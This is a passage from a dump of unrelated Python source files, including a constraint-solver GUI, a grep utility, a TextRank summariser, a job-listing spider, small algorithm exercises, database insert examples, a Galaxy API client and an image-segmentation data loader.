globals.app.removeCheckBox(c)\n except:\t\n pass\n self.constraintButtons = []\n self.expandConstraints()\n self.mergeConstraints()\n\n print(\"CONSTRAINTS\")\n print(globals.constraints)\n print(\"Our merged ones:\")\n print(self.mergedConstraints)\n \n for name in self.mergedConstraints:\n constraintStr = removeEndDigit(name)\n if int(self.mergedConstraints[name]['count']) > 1:\n constraintStr + '*'\n constraintStr + ': '\n for type in self.mergedConstraints[name]:\n constraintStr = constraintStr + \" \" + type + '(' + str(self.mergedConstraints[name][type]) + ')'\n checkBoxesToAdd.append(constraintStr)\n self.constraintButtons.append(constraintStr)\n\n return checkBoxesToAdd\n \n def satisfyConstraintCombo(self):\n pass\n \n @staticmethod\n def checkConstraints(button):\n globals.app.clearListBox(\"solution list\", callFunction=False)\n json_constraints = deployHandler.specifyCheckedConstraintsInXIR()\n \n if json_constraints == None:\n if NOXIR:\n globals.app.addListItem(\"solution list\",\"Need Xir support to process constraints.\")\n else:\n globals.app.addListItem(\"solution list\",\"Unable to process constraints.\")\n return\n\n print(json.dumps(json_constraints, sort_keys=False))\n \n mainUrl = 'http://127.0.0.1:5000/' \n s = requests.Session()\n try:\n r = s.post(mainUrl + 'site_solutions', json=json_constraints, timeout=1)\n possibleSolutions = False\n if 'results' in json.loads(r.json()):\n for result in json.loads(r.json())['results']:\n if result['result'] == 'solution':\n print(\"Solution from %s\" % \" \".join(result['site_combo']))\n globals.app.addListItem(\"solution list\",\" \".join(result['site_combo']))\n possibleSolutions = True\n if not possibleSolutions:\n globals.app.addListItem(\"solution list\",\"NO SOLUTIONS\")\n except requests.exceptions.ReadTimeout:\n globals.app.addListItem(\"solution list\",\"Solution not calculated yet.\")\n return\n except requests.exceptions.RequestException as e:\n globals.app.addListItem(\"solution list\",\"Constraint server unreachable (assumed to be at %s).\" % (mainUrl))\n return\n except Exception as e:\n print(e)\n return\n\n @staticmethod\n def specifyCheckedConstraintsInXIR():\n if NOXIR:\n return None\n \n top = xir.Xir()\n nodes = {}\n \n # Get a list of the checkboxed constraints we want to investigate.\n # XXX HACK: This will give us all checkboxes in the app. \n # So far we are only using these for constraints.\n n = 0\n for constraint in globals.app.getAllCheckBoxes():\n if not globals.app.getCheckBox(constraint):\n continue\n print(\"%s to xir\" % constraint)\n count = 0\n os = None\n nodetype = None\n # XXX right now we're assuming OS names and such won't have spaces!\n for item in constraint.split():\n # XXX again, hacky, we assume a '(' indicates a constraint.\n if '(' in item:\n try:\n (type, value) = item.split('(')\n value = value.strip(')')\n if type == 'os':\n os = value \n elif type == 'nodetype':\n nodetype = value\n elif type == 'count':\n count = int(value)\n except Exception as e:\n print(\"Problem parsing constraint: %s. %s\" % (constraint,e))\n \n # For now, we're skipping trying to get multiples of any one type\n # because the constraint solver can get overwhelmed.\n #for i in range(0,count):\n for i in range(0, 1):\n props = {'name': str(n)}\n if nodetype != None:\n props['platform'] = xir.select(value.strip()) \n if os != None:\n props['image'] = xir.select(value.strip())\n node = top.structure.node(props)\n nodes[n] = node\n n = n+1\n \n return top.structure.xir_dict()\n \n \n def checkConstraintServer(self):\n return True\n \n \n def getSuggestions(self, type='os'):\n suggestions = []\n try:\n s = requests.Session()\n r = s.post(mainUrl + 'getResourceList', data={'type':type})\n data = json.loads(r.content)\n for item in data:\n if item not in suggestions:\n suggestions.append(item)\n except Exception as e:\n print(e)\n pass\n \n print(\"SUGGESTIONS:\")\n print(suggestions)\n \n return suggestions\n \n \n ","sub_path":"DEW/deploy/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293952329","text":"import re, sys\nfrom os import listdir\nfrom os.path import isfile\n\ndef getInput(string):\n if sys.version_info[0] < 3:\n return raw_input(string)\n return input(string)\n\nprint(\"----------------------------------\\n\"\n \"This application will search all .txt files in the current directory for a matching \"\n \"string and print the filenames it finds matches for at the end.\\n\"\n \"You can also print out all matching lines as it searches.\\n\")\n\nstring = getInput('Enter string to match: ')\nverbose_mode = getInput('Print matching lines [Y]? ')\n\nprint(\"----------------------------------\\n\")\n\nregex_filename = re.compile('^.*\\.txt')\nregex_string = re.compile('.*' + string + '.*')\nmatches = []\n\n# Get all entries in this directory\nfor f in listdir('.'):\n # If its a file ending '.txt' process it\n if isfile(f) and regex_filename.search(f):\n found = False\n print( \"Checking > \"+f)\n # Iterate round all lines\n for i, line in enumerate(open(f)):\n line = line\n # Check each line for string\n for match in re.finditer(regex_string, line):\n found = True\n # if in verbose mode, show each line it found it at\n if verbose_mode.upper() == 'Y':\n print(' [%s] %s' % (i+1, line.strip()))\n\n # If the string was found anywhere, add it to summary list\n if found:\n matches.append(f)\n\n# Output all files where string existed\nprint(\"\\nSUMMARY\\n-------\")\nfor f in matches:\n print(f)\n\n","sub_path":"src/grepplus.py","file_name":"grepplus.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"482176128","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 10 21:34:18 2022\n\n@author: irtazakhalid\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit \n\ndef dom(a,b=1,points=100):\n return np.linspace(a,b,points)\n\ndef right_tail(dom, power=5):\n f = lambda x: 1/(x**power)\n return f(dom)/f(dom).sum()\n\ndef left_tail(dom, power=5):\n f = lambda x: 1/(x**power)\n return (f(dom)/f(dom).sum())[::-1]\n\ndef uniform(dom):\n return 1/len(dom)\n\ndef gaussian(dom):\n mean = np.mean(dom)\n f = lambda x: np.exp(-0.25*(x-mean)**2)\n return f(dom)/f(dom).sum()\n\ndef moments_vs_tails(a, pdfs=[right_tail, left_tail, gaussian, uniform]):\n fig, ax = plt.subplots(ncols=len(pdfs))\n ax = ax.ravel()\n a_grid = np.linspace(a,1,100)\n for j, pdf in enumerate(pdfs):\n sdict = {kk:np.zeros(100) for kk in [\"mean\", \"std\", \"mom_2\", \"mom_3\"]}\n for i,a in enumerate(a_grid):\n x = dom(a=a,b=1, points=50)\n # x[-1]=0.2\n # reduce a to make pdf weights grow faster, transition to delta\n # weights are always constant, just shifting the domain..\n pdfw = pdf(dom(a=0.5, b=1, points=50))\n mean = (pdfw*x).sum()\n sdict[\"mean\"][i] = mean\n sdict[\"std\"][i] = np.sqrt((pdfw*(x-mean)**2).sum())\n sdict[\"mom_2\"][i] = np.power((pdfw*(x)**2).sum(),1)#*(1/50)**(1/3-1/1)\n sdict[\"mom_3\"][i] = np.power((pdfw*(x)**3).sum(),1)\n \n for key in sdict:\n ax[j].plot(a_grid, sdict[key], label=key)\n ax[j].set_xlabel(\"a dom left\")\n ax[j].set_title(pdf.__name__)\n ax[j].vlines(0.5, 0, 1, linestyles=\"--\")\n ax[0].set_ylabel(\"statistic\")\n ax[0].legend(fontsize=7)\n plt.tight_layout() \n \nmoments_vs_tails(0.001)\n\n\ndef p_order_rim(a=0.2, b=1,pdfs=[right_tail, left_tail, gaussian, uniform]):\n ps=range(1,50)\n x = dom(a=a, b=b, points=100)\n plt.figure()\n for pdf in pdfs:\n out = []\n for power in ps:\n pdfw = pdf(dom(a=0.5, b=1, points=100))\n # x[-1]=0.2\n out.append(np.power((pdfw*(1-x)**power).sum(), 1/power))\n \n plt.plot(ps, out, label=pdf.__name__)\n f = lambda x,a,b: a*np.log(x)+b\n ff,_=curve_fit(f, ps, out)\n plt.plot(ps, f(ps, *ff), linestyle=\"--\",label=f\"log fit slope {round(ff[0],3)}\")\n \n plt.xlabel(\"p\")\n plt.ylabel(\"p-order rim\")\n plt.legend()\n plt.title(f\"dom [{a}, {b}]\")\n\ndef samples_vs_mean_val():\n plt.figure()\n for low in np.linspace(0.01, 0.99, 10):\n rims = []\n ns = np.arange(10,100,10)\n for n in ns:\n rims.append((1-np.random.uniform(low=low, high=1, size=n)).mean())\n plt.plot(ns, rims*ns**(0.5), label=f\"min(rim)={np.round(low,2)}\")\n plt.xlabel(\"samples\")\n plt.ylabel(\"rim upper bound\")\n plt.legend()\np_order_rim()\nsamples_vs_mean_val()\nplt.show()\n \n \n ","sub_path":"rim_analysis.py","file_name":"rim_analysis.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"89725705","text":"from readCsv import getTitles, getContents\r\nimport csv\r\nimport numpy as np\r\nfrom konlpy.tag import Kkma\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nkkma = Kkma()\r\n\r\nlist_titles = getTitles()\r\nlist_contents = getContents()\r\n\r\nf = open('summaries.csv', 'w', newline=\"\\n\", encoding='utf-8')\r\nwriter = csv.writer(f)\r\n\r\nfor contents in list_contents:\r\n list_sentences = []\r\n list_temp = kkma.sentences(contents)\r\n for i in range(len(list_temp)):\r\n if len(list_temp[i]) > 10:\r\n list_sentences.append(list_temp[i])\r\n tfidf = TfidfVectorizer()\r\n tfidf_sentence_matrix = tfidf.fit_transform(list_sentences).toarray()\r\n transpose_tfidf_sentence_matrix = np.transpose(tfidf_sentence_matrix) # 그래프 생성을 위한 전치행렬 만들기\r\n sentence_graph = np.dot(tfidf_sentence_matrix, transpose_tfidf_sentence_matrix) # 전치행렬과의 곱으로 그래프에서 어느 노드들이 엣지로 연결되었는지 나타내는 정사각 행렬을 구한다.\r\n d = 0.85 # damping factor , PageRank에서 웹 서핑을 하는 사람이 해당 페이지를 만족하지 못하고 다른페이지로 이동하는 확률로써, TextRank에서도 그 값을 그대로 사용(0.85로 설정)\r\n A = sentence_graph\r\n size = sentence_graph.shape[0]\r\n for i in range(size):\r\n A[i][i] = 0\r\n sum_row = np.sum(A[i][:])\r\n if sum_row != 0:\r\n A[i][:] /= sum_row # textrank formula에서 한 노드와 연결된 다른 노드들의 가중치값을 나누는 부분 -> 이후 상수에 반영 \r\n A[i][:] *= -d # TR(Vi) = (1-d) + d * sum(가중치*TR(Vj)) -> TR(Vi) - d(c1TR(Va) + c2TR(Vb) + c3TR(Vc) + c4TR(Vd)) = 1 - d (c1, c2, c3, c4 is constant) ->Ax=B\r\n A[i][i] = 1\r\n B = (1 - d) * np.ones((size, 1))\r\n textrank = np.linalg.solve(A, B) # x = [TR(Va), TR(Vb), TR(Vc), TR(Vd)] -> each textrank\r\n idx_textrank = enumerate(textrank)\r\n sorted_textrank = sorted(idx_textrank, key = lambda x: x[1], reverse = True)\r\n\r\n contents = \"\"\r\n summaries = []\r\n\r\n for idx in sorted_textrank[:5]:\r\n contents = contents + list_sentences[idx[0]]\r\n summaries.append(contents)\r\n for summary in summaries:\r\n writer.writerow([summary])\r\n\r\nf.close()","sub_path":"make_summary.py","file_name":"make_summary.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"262314973","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Damen spider created on top of the ATSSpider\nscrapy crawl damen -a url=\"http://career.damen.com/en/jobs\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://career.damen.com/en/jobs\n\"\"\"\nfrom re import compile\nfrom urlparse import urljoin\nfrom json import loads as json_loads\nfrom hashlib import md5\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, NormalizedJoin\n\n\nclass Damen(ATSSpider):\n\n name = \"damen\"\n api_re = compile(\"pagesize=10\")\n jobs_per_page = 100\n search_offset = 0\n\n def parse(self, response):\n sel = Selector(response)\n api_url = sel.xpath(\n \"//meta[@name='listinghandler']/@content\"\n ).extract()\n if api_url:\n self.api_url = urljoin(\n response.url,\n self.api_re.sub(\"pagesize=%s\" % self.jobs_per_page, api_url[0])\n )\n yield Request(url=self.api_url, callback=self.parse_json_jobs)\n\n def parse_json_jobs(self, response):\n try:\n api_jobs = json_loads(response.body)\n except:\n # no json data, exiting\n return\n\n if self.search_offset == 0:\n self.expected_job_count = api_jobs.get(\"TotalItems\", -1)\n\n for job in api_jobs.get('ResultItems', []):\n job_url = urljoin(response.url, job.get('Url', ''))\n meta = {\n 'title': job.get('Title', ''),\n 'jobcategory': [\n x.get('Name', '') for x in job.get('JobTypes', [])\n ],\n 'location': [\n job.get('LocationName', ''),\n job.get('LocationCity', ''),\n job.get('LocationCountryCode', '')\n ],\n 'experiencerequirements': job.get('Experience', ''),\n }\n yield Request(\n url=job_url, meta=meta, callback=self.parse_job_callback()\n )\n\n self.search_offset += self.jobs_per_page\n if self.search_offset < self.expected_job_count:\n yield Request(\n url=\"%s&startindex=%s\" % (self.api_url, self.search_offset),\n callback=self.parse_json_jobs\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('jobcategory', response.meta['jobcategory'])\n loader.add_value(\n 'location', response.meta['location'], NormalizedJoin(\", \")\n )\n loader.add_value(\n 'experiencerequirements', response.meta['experiencerequirements']\n )\n loader.add_xpath(\n 'educationrequirements',\n \"//label[text()='Level of education']/following-sibling::p\"\n )\n loader.add_xpath(\n 'description',\n [\n \"//div[@class='user-generated']/node()[not(@class='buttonbar' or preceding-sibling::p[@class='buttonbar'])]\",\n \"//div[@class='section' and (h2//*[contains(text(),'Profile') or contains(text(),'Profiel')] or h2[contains(text(),'Profile') or contains(text(),'Profiel')])]/node()[not(self::img)]\"\n ]\n )\n loader.add_xpath(\n 'responsibilities',\n \"//div[@class='section' and h2[contains(text(),'Tasks & Responsibilities') or contains(text(), 'Taken & Verantwoordelijkheden')]]/node()\"\n )\n loader.add_xpath(\n 'company_description',\n \"//div[@class='section' and h2[contains(text(),'Department Information')]]/text()\"\n )\n loader.add_value(\n 'referencenumber', md5(response.url).hexdigest(),\n Prefix(\"%s-\" % self.name)\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/damen.py","file_name":"damen.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"374621017","text":"#LISTA\nnumeros = list()\ntam = int(input(\"Tamanho do vetor: \"))\nfor i in range(tam):\n valor = int(input(f\"Digite o numero do vetor na posição {i}: \"))\n numeros.append(valor)\n\n# BUSCA LINEAR\nnum_pesquisa = int(input(\"Número pesquisado: \"))\nposicao_resultado = -1\n\nfor i in range(tam):\n if numeros[i] == num_pesquisa:\n posicao_resultado = i\n break\nif posicao_resultado < 0:\n print('Número não encontrado')\nelse:\n print(f\"Número encontrado na posição {posicao_resultado}\")\n#FIM BUSCA LINEAR","sub_path":"Python - Algoritmos 1/busca_linear.py","file_name":"busca_linear.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538259102","text":"import mysql.connector\nimport uuid\n\n\ndef octave_simulate():\n res = list()\n \n for i in range(0,17):\n res.append(None)\n \n res[2] = 0.2345\n res[4] = 1.4322\n res[8] = 0.000023\n\n return res\n\n\ndef example_sql():\n work_id = str(uuid.uuid1())\n\n # None in Python will be translated to NULL in MariaDB\n results = octave_simulate()\n \n db = mysql.connector.connect(\n host=\"127.0.0.1\",\n user=\"ubuntu\",\n passwd=\"ubuntu\",\n database=\"benchop\"\n )\n \n cur = db.cursor()\n\n sql = \"INSERT INTO results (id, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, r12, r13, r14, r15, r16, r17) \" \\\n \"values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n val = (work_id, results[0], results[1], results[2], results[3], results[4], results[5], results[6], results[7],\n results[8], results[9], results[10], results[11], results[12], results[13], results[14], results[15],\n results[16])\n cur.execute(sql, val)\n \n db.commit()\n db.close()\n\n\ndef main():\n example_sql()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"code/db/db_example_insert.py","file_name":"db_example_insert.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221796715","text":"from __future__ import print_function, absolute_import, division\n\nimport os\nimport sys\nimport cv2\nimport glob\nimport torch\nimport pathlib\nimport numpy as np\nfrom torch import nn\nfrom PIL import Image\nimport torch.nn.functional as F\nfrom skimage.io import imread\nimport matplotlib.pyplot as plt\nfrom utils.label_utils import get_labels\nfrom sklearn.externals._pilutil import bytescale\n\ndef re_normalize(inp: np.ndarray, low: int = 0, high: int = 255):\n \"\"\"Normalize the data to a certain range. Default: [0-255]\"\"\"\n inp_out = bytescale(inp, low=low, high=high)\n return inp_out\n\n\nlabels = get_labels()\nid2label = { label.id : label for label in labels }\ntrainid2label = { label.trainId : label for label in labels }\n\nclass SegmentationDataset(torch.utils.data.Dataset):\n def __init__(self, cfg: dict, split=\"train\", transform=None, labels=True):\n self.cfg = cfg\n self.split = split\n self.labels = labels\n self.crop_size = cfg.CROP_SIZE\n self.base_size = cfg.BASE_SIZE\n \n search_image_files = os.path.join(\n cfg.DATA_DIR,\n cfg.IMAGE_DIR, \n split, '*', \n cfg.INPUT_PATTERN)\n\n if labels:\n search_annot_files = os.path.join(\n cfg.DATA_DIR,\n cfg.LABEL_DIR, \n split, '*', \n cfg.ANNOT_PATTERN)\n \n \n # root directory\n root = pathlib.Path.cwd() \n\n input_path = str(root / search_image_files)\n if labels:\n target_path = str(root / search_annot_files)\n \n self.inputs = [pathlib.PurePath(file) for file in sorted(glob.glob(search_image_files))]\n if labels:\n self.targets = [pathlib.PurePath(file) for file in sorted(glob.glob(search_annot_files))]\n \n # print(\"{} images\".format(len(self.inputs)))\n # print(\"{} masks\".format(len(self.targets)))\n \n self.transform = transform\n self.inputs_dtype = torch.float32\n if labels:\n self.targets_dtype = torch.int64\n \n self.class_weights = torch.FloatTensor([0.8373, 0.918, 0.866, 1.0345, \n 1.0166, 0.9969, 0.9754, 1.0489,\n 0.8786, 1.0023, 0.9539, 0.9843, \n 1.1116, 0.9037, 1.0865, 1.0955, \n 1.0865, 1.1529, 1.0507]) # .cuda()\n \n\n def __len__(self):\n return len(self.inputs)\n\n def __getitem__(self, index: int):\n \n # Select the sample\n input_ID = self.inputs[index]\n if self.labels:\n target_ID = self.targets[index]\n name = os.path.splitext(os.path.basename(input_ID))[0]\n\n # Load input and target\n if self.labels:\n x, y = imread(str(input_ID)), imread(str(target_ID))\n else:\n x = imread(str(input_ID))\n size = x.shape\n \n # Preprocessing\n if (self.transform is not None) and self.labels:\n x, y = self.transform(x, y)\n elif self.transform is not None:\n x = self.transform(x)\n\n # Typecasting\n if self.labels:\n x, y = torch.from_numpy(x).type(self.inputs_dtype), torch.from_numpy(y).type(self.targets_dtype)\n y = y.squeeze()\n return x, y, np.array(size), name\n else:\n x = torch.from_numpy(x).type(self.inputs_dtype)\n return x, np.array(size), name\n \n \n def inference(self, model, image):\n # assume input image is channels first\n batch, _, ori_height, ori_width = image.size()\n assert batch == 1, \"only supporting batchsize 1.\"\n # convert to channels last for resizing\n image = image.numpy()[0].transpose((1,2,0)).copy()\n h, w = self.crop_size\n new_img = cv2.resize(image, (w, h), interpolation=cv2.INTER_LINEAR)\n # convert to channels first for inference\n new_img = new_img.transpose((2, 0, 1))\n new_img = np.expand_dims(new_img, axis=0)\n pred = model(torch.from_numpy(new_img))\n # resize to base size\n pred = F.interpolate(input=pred, size=(ori_height, ori_width), mode='bilinear', align_corners=False)\n # pred = pred.numpy()\n return pred.exp()\n \n \n def label_to_rgb(self, seg):\n h = seg.shape[0]\n w = seg.shape[1]\n seg_rgb = np.zeros((h, w, 3), dtype=np.uint8)\n for key, val in trainid2label.items():\n indices = seg == key\n seg_rgb[indices.squeeze()] = val.color \n return seg_rgb\n \n \n def save_pred(self, image, pred, sv_path, name):\n pred = np.asarray(np.argmax(pred.cpu(), axis=1), dtype=np.uint8)\n pred = self.label_to_rgb(pred[0])\n image = image.cpu()\n image = image[0].permute(1,2,0).numpy()\n image = re_normalize(image)\n\n blend = cv2.addWeighted(image, 0.8, pred, 0.8, 0)\n pil_blend = Image.fromarray(blend).convert(\"RGB\")\n pil_blend.save(os.path.join(sv_path, name[0]+'.png'))\n\n \n \n\ndef label_mapping(seg: np.ndarray, label_map: dict):\n seg = seg.astype(np.int32)\n temp = np.copy(seg)\n for key, val in label_map.items():\n seg[temp == key] = val.trainId\n return seg\n\n\ndef cityscapes_label_to_rgb(mask):\n h = mask.shape[0]\n w = mask.shape[1]\n mask_rgb = np.zeros((h, w, 3), dtype=np.uint8)\n for key, val in trainid2label.items():\n indices = mask == key\n mask_rgb[indices.squeeze()] = val.color \n return mask_rgb\n\n\ndef display(display_list):\n plt.figure(figsize=(15, 5), dpi=150)\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(display_list[i])\n plt.axis('off')\n plt.tight_layout()\n plt.show()\n\n \ndef display_blend(display_list):\n plt.figure(figsize=(10, 10), dpi=150)\n for i in range(len(display_list)):\n blend = cv2.addWeighted(display_list[i][0], 0.8, display_list[i][1], 0.5, 0)\n plt.subplot(1, len(display_list), i+1)\n plt.imshow(blend)\n plt.axis('off')\n plt.tight_layout()\n plt.show()","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"193619500","text":"import pandas as lectorCsv\nimport pymongo\nfrom pymongo import MongoClient\n\ndef captura():\n \n temperatura = lectorCsv.read_csv(\"./Datos/temperature.csv\")\n humedad = lectorCsv.read_csv(\"./Datos/humidity.csv\")\n\n temperatura = temperatura[['datetime','San Francisco']]\n temperatura = temperatura.rename(columns={'San Francisco': 'Temperatura'})\n\n humedad = humedad[['datetime','San Francisco']]\n humedad = humedad.rename(columns={'San Francisco': 'Humedad'})\n\n datos = lectorCsv.merge(temperatura,humedad, on= 'datetime')\n # Limpiar datos https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.dropna.html\n datos = datos.dropna()\n # Coge los 100 ultimos, empezando por abajo https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.tail.html\n datos = datos.tail(100)\n\n # How to connect with MongoClient https://mongodb.github.io/node-mongodb-native/driver-articles/mongoclient.html\n # https://stackoverflow.com/questions/40346767/pymongo-auth-failed-in-python-script\n # https://pymongo.readthedocs.io/en/stable/examples/authentication.html\n client = MongoClient('mongodb+srv://%s:%s@p2gbv.lpeag.mongodb.net/SanFrancisco?retryWrites=true&w=majority' % ('admin', 'admin'))\n # El nombre de la base de datos\n baseDeDatos = client[\"SanFrancisco\"]\n # La columna que voy a usar\n columna = baseDeDatos[\"Pronostico\"]\n # Poner un indice, pero sin hacer ninguna copia (inplace=True) https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.reset_index.html\n datos.reset_index(inplace=True)\n # https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_dict.html\n data_dict = datos.to_dict(\"records\")\n # Bulk insert https://docs.mongodb.com/manual/reference/method/db.collection.insertMany/\n # https://pymongo.readthedocs.io/en/stable/tutorial.html TIENE QUE SER UN CLIENTE NO UN DATABASE OBJECT\n columna.insert_many(data_dict)\n\nif __name__ == '__main__':\n captura()","sub_path":"capturaDatos.py","file_name":"capturaDatos.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"590907487","text":"# hackerrank twoSum problem with a twist - returns all pairs\n# algorithm runs O(nlogn)\n\n\ndef binarysearch(array, target): # binary search to find compliment in O(logn) time\n low = 0\n high = len(array) - 1\n index = -1\n while low <= high:\n mid = low + (high - low) // 2\n if array[mid] < target:\n low = mid + 1\n elif array[mid] > target:\n high = mid - 1\n elif array[mid] == target:\n index = mid\n break\n return index\n\n\ndef merge(des, left, right):\n d_index = 0 # destination index\n r_index = 0 # right index\n l_index = 0 # left index\n while l_index < len(left) and r_index < len(right):\n if left[l_index] <= right[r_index]:\n des[d_index] = left[l_index]\n d_index += 1\n l_index += 1\n else:\n des[d_index] = right[r_index]\n r_index += 1\n d_index += 1\n while l_index < len(left):\n des[d_index] = left[l_index]\n d_index += 1\n l_index += 1\n while r_index < len(right):\n des[d_index] = right[r_index]\n d_index += 1\n r_index += 1\n return des\n\n\n# recursive merge sort\n# implemented one for fun\ndef mergesort(arr):\n if len(arr) < 2:\n return arr\n\n mid = len(arr) // 2\n left = arr[0:mid]\n right = arr[mid: len(arr)]\n\n mergesort(left)\n mergesort(right)\n\n return merge(arr, left, right)\n\n\ndef compliments(array, target):\n if len(array) < 2: # array must have at least two values\n return []\n pair = [] # return all unique pairs\n mergesort(array) # sort array for effective binary search\n for value in array:\n temp = [] # track pairs\n compliment = target - value # find value compliment\n index = binarysearch(array, compliment) # if compliment exist\n if index != -1:\n temp.append(value)\n temp.append(array[index])\n mergesort(temp) # we don't want duplicate order like [-1, 10] and [10, -1]\n if temp not in pair: # only add if pair doesn't exit\n pair.append(temp)\n return pair\n\n\n# test case\na = [0, 3, 9, - 1, 8, 1, 10, 4, 5, 6, 3, 2, 7]\nprint(compliments(a, 9))\n","sub_path":"TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"335712741","text":"\"\"\"\nContains possible interaction dealing with Galaxy dependency resolvers.\n\"\"\"\nfrom bioblend.galaxy.client import Client\n\n\nclass ToolDependenciesClient(Client):\n\n def __init__(self, galaxy_instance):\n self.module = 'dependency_resolvers'\n super().__init__(galaxy_instance)\n\n def summarize_toolbox(self, index=None, tool_ids=[], resolver_type=None, include_containers=None, container_type=None, index_by=None):\n \"\"\"\n GET /api/dependency_resolvers/toolbox\n\n Summarize requirements across toolbox (for Tool Management grid). This is an experiemental\n API particularly tied to the GUI - expect breaking changes until this notice is removed.\n\n :type index: int\n :param index: index of the dependency resolver\n :type tool_ids: list\n :param tool_ids: tool_ids to return when index_by=tool\n :type resolver_type: str\n :param resolver_type: restrict to specified resolver type\n :type include_containers: bool\n :param include_containers: include container resolvers in resolution\n :type container_type: str\n :param container_type: restrict to specified container type\n :type index_by: str\n :param index_by: By default consider only context of requirements, group tools by requirements.\n Set this to 'tools' to summarize across all tools though. Tools may provide additional\n context for container resolution for instance.\n\n :rtype: list\n :returns: dictified descriptions of the dependencies, with attribute\n `dependency_type: None` if no match was found.\n For example::\n \n [{'requirements': [{'name': 'galaxy_sequence_utils',\n 'specs': [],\n 'type': 'package',\n 'version': '1.1.4'},\n {'name': 'bx-python',\n 'specs': [],\n 'type': 'package',\n 'version': '0.8.6'}],\n 'status': [{'cacheable': False,\n 'dependency_type': None,\n 'exact': True,\n 'model_class': 'NullDependency',\n 'name': 'galaxy_sequence_utils',\n 'version': '1.1.4'},\n {'cacheable': False,\n 'dependency_type': None,\n 'exact': True,\n 'model_class': 'NullDependency',\n 'name': 'bx-python',\n 'version': '0.8.6'}],\n 'tool_ids': ['vcf_to_maf_customtrack1']}] \n \"\"\"\n\n params = {}\n if index:\n params['index'] = str(index)\n if tool_ids:\n params['tool_ids'] = ','.join(tool_ids)\n if resolver_type:\n params['resolver_type'] = resolver_type\n if include_containers is not None:\n params['include_containers'] = str(include_containers)\n if container_type:\n params['container_type'] = container_type\n if index_by:\n params['index_by'] = index_by\n\n url = self._make_url() + '/toolbox'\n return self._get(url=url, params=params)\n\n","sub_path":"bioblend/galaxy/tool_dependencies/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"32296680","text":"import csv\n\ndef load(filename, columns=[], rows=[], headers=True, grouped=True, delimiter=',', quotechar='\\\"'):\n rows = {r for r in rows}\n with open(filename, newline='') as f:\n reader = csv.reader(f, delimiter=delimiter, quotechar=quotechar)\n # get headers\n if headers:\n col_names = next(reader)\n if len(columns):\n col_names = [col_names[col] for col in columns]\n # get data\n if len(columns) and len(rows): data = [[row[col] for col in columns] for row in reader if row in rows]\n elif len(columns): data = [[row[col] for col in columns] for row in reader]\n elif len(rows): data = [row for row in reader if row in rows]\n else: data = [row for row in reader]\n return col_names, data\n\ndef save(filename, headers=[], data=[], delimiter=',', quotechar='\\\"', quoting=csv.QUOTE_MINIMAL):\n with open(filename, 'w', newline='') as f:\n writer = csv.writer(f, delimiter=delimiter, quotechar=quotechar, quoting=quoting)\n if len(headers):\n writer.writerow(headers)\n [writer.writerow(row) for row in data]\n\ndef append(filename, data=[], delimiter=',', quotechar='\\\"', quoting=csv.QUOTE_MINIMAL):\n with open(filename, 'a', newline='') as f:\n writer = csv.writer(f, delimiter=delimiter, quotechar=quotechar, quoting=quoting)\n [writer.writerow(row) for row in data]","sub_path":"SimpPyKit/simple_csv.py","file_name":"simple_csv.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"20470078","text":"from urllib.request import Request, urlopen\nimport json\nfrom api import settings\nfrom api.images import get_images_serie, get_images_seasons, get_images_season, get_images_episode, get_images_movie\n\n\ndef Movie(id, images = False, extended = True):\n\turl = settings.URL + '/movies/' + id + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = 